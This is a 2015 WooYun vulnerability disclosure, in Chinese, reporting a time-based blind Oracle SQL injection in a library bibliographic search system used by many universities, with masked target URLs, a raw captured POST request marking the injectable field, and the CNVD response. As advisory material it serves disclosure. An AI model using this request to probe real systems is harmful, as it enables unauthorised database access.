当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148976

漏洞标题:某书目数据检索系统oracle盲注一枚

相关厂商:北京金盘软件技术有限公司

漏洞作者: 路人甲

提交时间:2015-10-24 20:58

修复时间:2015-11-04 10:30

公开时间:2015-11-04 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-24: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-22: 细节向核心白帽子及相关领域专家公开
2016-01-01: 细节向普通白帽子公开
2016-01-11: 细节向实习白帽子公开
2015-11-04: 细节向公众公开

简要描述:

详细说明:

某书目数据检索系统oracle时间盲注一枚(影响众多高校).
案例:
**.**.**.**:8098/MagazineCantoRequest.aspx
**.**.**.**/gdweb/MagazineCantoRequest.aspx
http://**.**.**.**:8086/gdlisweb/MagazineCantoRequest.aspx
http://**.**.**.**:82/netweb/MagazineCantoRequest.aspx
http://**.**.**.**/MagazineCantoRequest.aspx
**.**.**.**/MagazineCantoRequest.aspx

漏洞证明:

注入证明:**.**.**.**:8098/MagazineCantoRequest.aspx

QQ图片20151023191000.jpg


抓包注入之:

POST /MagazineCantoRequest.aspx HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: **.**.**.**:8098/MagazineCantoRequest.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
DontTrackMeHere: gzip, deflate
Host: **.**.**.**:8098
Content-Length: 2164
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=gdwjom55n5ayxziszntavk55; CheckCode=BU3B89
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTgxMzU4Mjc0OQ9kFgICAw9kFgYCAw9kFgQCAQ8WAh4JaW5uZXJodG1sBRjph5Hnm5jppobol4%2Fmn6Xor6Lns7vnu59kAgMPDxYCHgRUZXh0BeIGPHRkIHN0eWxlPSJoZWlnaHQ6IDIxcHgiPjxBIGhyZWY9J2RlZmF1bHQuYXNweCc%2BPHNwYW4%2B6aaW6aG1PC9zcGFuPjwvQT48L3RkPjx0ZCBzdHlsZT0iaGVpZ2h0OiAyMXB4Ij48QSBocmVmPSdkZWZhdWx0LmFzcHgnPjxzcGFuPuS5puebruafpeivojwvc3Bhbj48L0E%2BPC90ZD48dGQgc3R5bGU9ImhlaWdodDogMjFweCI%2BPEEgaHJlZj0nTWFnYXppbmVDYW50b1NjYXJjaC5hc3B4Jz48c3Bhbj7mnJ%2FliIrnr4flkI08L3NwYW4%2BPC9BPjwvdGQ%2BPHRkIHN0eWxlPSJoZWlnaHQ6IDIxcHgiPjxBIGhyZWY9J1Jlc2VydmVkTGlzdC5hc3B4Jz48c3Bhbj7pooTnuqbliLDppoY8L3NwYW4%2BPC9BPjwvdGQ%2BPHRkIHN0eWxlPSJoZWlnaHQ6IDIxcHgiPjxBIGhyZWY9J0V4cGlyZWRMaXN0LmFzcHgnPjxzcGFuPui2heacn%2BWFrOWRijwvc3Bhbj48L0E%2BPC90ZD48dGQgc3R5bGU9ImhlaWdodDogMjFweCI%2BPEEgaHJlZj0nTmV3Qm9vS1NjYXJjaC5hc3B4Jz48c3Bhbj7mlrDkuabpgJrmiqU8L3NwYW4%2BPC9BPjwvdGQ%2BPHRkIHN0eWxlPSJoZWlnaHQ6IDIxcHgiPjxBIGhyZWY9J0FkdmljZXNTY2FyY2guYXNweCc%2BPHNwYW4%2B5oOF5oql5qOA57SiPC9zcGFuPjwvQT48L3RkPjx0ZCBzdHlsZT0iaGVpZ2h0OiAyMXB4Ij48QSBocmVmPSdXcml0ZUpHQm9vay5hc3B4Jz48c3Bhbj7mlrDkuablvoHorqI8L3NwYW4%2BPC9BPjwvdGQ%2BPHRkIHN0eWxlPSJoZWlnaHQ6IDIxcHgiPjxBIGhyZWY9J1JlYWRlckxvZ2luLmFzcHgnPjxzcGFuPuivu%2BiAheeZu%2BW9lTwvc3Bhbj48L0E%2BPC90ZD48dGQgc3R5bGU9ImhlaWdodDogMjFweCI%2BPEEgaHJlZj0nT25saW5lU3R1ZHkuYXNweCc%2BPHNwYW4%2B5Zyo57q%2F5ZKo6K%2BiL%2BWfueiurTwvc3Bhbj48L0E%2BPC90ZD5kZAIFDw8WAh8BBRjph5Hnm5jkuabnm67mlbDmja7mn6Xor6JkZAIHD2QWBAICDw8WAh8BBTI8c3Bhbj7mrKLov47mgqg6R3Vlc3Qg6K%2B36YCJ5oup5L2g55qE5pON5L2cPC9zcGFuPmRkAgMPDxYCHgdWaXNpYmxlaGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQhNeVBhcGVyMdJ%2Fte%2FH%2F9%2B3wxRq1AmK7%2BKDhTxM&__EVENTVALIDATION=%2FwEWGgL%2BwcELAuCdnvQEAqW6u6sFAuiE2O0DAsTEuKsFAumdmIsOArzbvL4HAuiYmoIKAvO2s4kDAoKgmuIJAuXDqMcPAtWpgKcEAqyOr7AHAsKNjsYOAuzRirUFAtPfvL8JApLLvL8JAvOGiLkCAsPmvKkPArursYYIAsbEuKsFAuudmIsOAtO%2FpIsGAvm1oP8KAsOvo%2F8KAoznisYGVzstt9iYPNtQ8Tyod54o821YOTo%3D&DropDownList1=%E7%AF%87%E5%90%8D&TextBox3=%27&DropDownList2=%E5%89%8D%E6%96%B9%E4%B8%80%E8%87%B4&Button2=%E4%BA%8C%E6%AC%A1%E6%A3%80%E7%B4%A2&radio=%E7%BB%93%E6%9E%9C&DropDownList3=%E7%AF%87%E5%90%8D&DropDownList4=%E5%8D%87%E5%BA%8F&MyPaper1_PageNo=1


2011303257915c2e73985444999a45ee11a64e94.png


修复方案:

.....

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-28 15:33

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道软件生产厂商通报,涉及大学案例,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。

最新状态:

暂无